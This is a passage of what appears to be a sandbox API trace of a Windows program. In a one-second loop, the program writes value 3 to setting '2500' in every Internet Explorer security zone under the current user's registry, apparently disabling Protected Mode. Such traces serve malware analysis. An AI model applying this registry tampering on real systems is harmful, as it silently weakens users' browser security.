	[0071.468] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0071.468] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0071.468] RegCloseKey (hKey=0x224) returned 0x0
	[0071.468] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0071.468] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0071.468] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0071.468] RegCloseKey (hKey=0x224) returned 0x0
	[0071.468] Sleep (dwMilliseconds=0x3e8) 
	[0072.504] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0072.504] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0072.504] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0072.505] RegCloseKey (hKey=0x224) returned 0x0
	[0072.505] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0072.505] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0072.505] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0072.505] RegCloseKey (hKey=0x224) returned 0x0
	[0072.505] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0072.505] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0072.505] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0072.505] RegCloseKey (hKey=0x224) returned 0x0
	[0072.505] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0072.505] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0072.505] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0072.505] RegCloseKey (hKey=0x224) returned 0x0
	[0072.505] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0072.505] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0072.505] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0072.505] RegCloseKey (hKey=0x224) returned 0x0
	[0072.505] Sleep (dwMilliseconds=0x3e8) 
	[0073.532] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0073.532] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0073.533] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0073.533] RegCloseKey (hKey=0x224) returned 0x0
	[0073.533] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0073.533] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0073.533] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0073.533] RegCloseKey (hKey=0x224) returned 0x0
	[0073.533] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0073.533] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0073.534] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0073.534] RegCloseKey (hKey=0x224) returned 0x0
	[0073.534] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0073.534] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0073.534] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0073.534] RegCloseKey (hKey=0x224) returned 0x0
	[0073.534] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0073.534] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0073.534] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0073.534] RegCloseKey (hKey=0x224) returned 0x0
	[0073.534] Sleep (dwMilliseconds=0x3e8) 
	[0074.535] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0074.535] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0074.535] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0074.535] RegCloseKey (hKey=0x224) returned 0x0
	[0074.535] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0074.535] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0074.535] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0074.535] RegCloseKey (hKey=0x224) returned 0x0
	[0074.535] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0074.535] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0074.536] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0074.536] RegCloseKey (hKey=0x224) returned 0x0
	[0074.537] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0074.537] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0074.537] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0074.537] RegCloseKey (hKey=0x224) returned 0x0
	[0074.537] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0074.537] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0074.537] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0074.538] RegCloseKey (hKey=0x224) returned 0x0
	[0074.538] Sleep (dwMilliseconds=0x3e8) 
	[0075.555] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0075.555] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0075.555] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0075.555] RegCloseKey (hKey=0x224) returned 0x0
	[0075.555] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0075.555] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0075.555] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0075.556] RegCloseKey (hKey=0x224) returned 0x0
	[0075.556] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0075.556] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0075.556] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0075.556] RegCloseKey (hKey=0x224) returned 0x0
	[0075.556] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0075.556] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0075.556] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0075.556] RegCloseKey (hKey=0x224) returned 0x0
	[0075.556] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0075.556] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0075.556] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0075.556] RegCloseKey (hKey=0x224) returned 0x0
	[0075.556] Sleep (dwMilliseconds=0x3e8) 
	[0076.632] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0076.632] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0076.633] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0076.633] RegCloseKey (hKey=0x224) returned 0x0
	[0076.633] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0076.633] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0076.633] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0076.633] RegCloseKey (hKey=0x224) returned 0x0
	[0076.633] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0076.633] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0076.633] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0076.634] RegCloseKey (hKey=0x224) returned 0x0
	[0076.634] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0076.634] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0076.634] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0076.634] RegCloseKey (hKey=0x224) returned 0x0
	[0076.634] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0076.634] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0076.634] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0076.634] RegCloseKey (hKey=0x224) returned 0x0
	[0076.634] Sleep (dwMilliseconds=0x3e8) 
	[0077.712] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0077.712] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0077.713] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0077.713] RegCloseKey (hKey=0x224) returned 0x0
	[0077.713] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0077.713] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0077.713] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0077.713] RegCloseKey (hKey=0x224) returned 0x0
	[0077.713] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0077.713] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0077.713] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0077.713] RegCloseKey (hKey=0x224) returned 0x0
	[0077.713] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0077.713] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0077.713] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0077.713] RegCloseKey (hKey=0x224) returned 0x0
	[0077.713] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0077.714] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0077.714] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0077.714] RegCloseKey (hKey=0x224) returned 0x0
	[0077.714] Sleep (dwMilliseconds=0x3e8) 
	[0078.775] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0078.775] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0078.776] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0078.776] RegCloseKey (hKey=0x224) returned 0x0
	[0078.776] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0078.776] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0078.776] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0078.776] RegCloseKey (hKey=0x224) returned 0x0
	[0078.776] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0078.776] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0078.776] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0078.776] RegCloseKey (hKey=0x224) returned 0x0
	[0078.776] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0078.776] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0078.776] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0078.776] RegCloseKey (hKey=0x224) returned 0x0
	[0078.776] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0078.776] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0078.777] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0078.777] RegCloseKey (hKey=0x224) returned 0x0
	[0078.777] Sleep (dwMilliseconds=0x3e8) 
	[0079.850] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0079.850] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0079.851] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0079.851] RegCloseKey (hKey=0x224) returned 0x0
	[0079.851] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0079.851] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0079.851] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0079.851] RegCloseKey (hKey=0x224) returned 0x0
	[0079.851] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
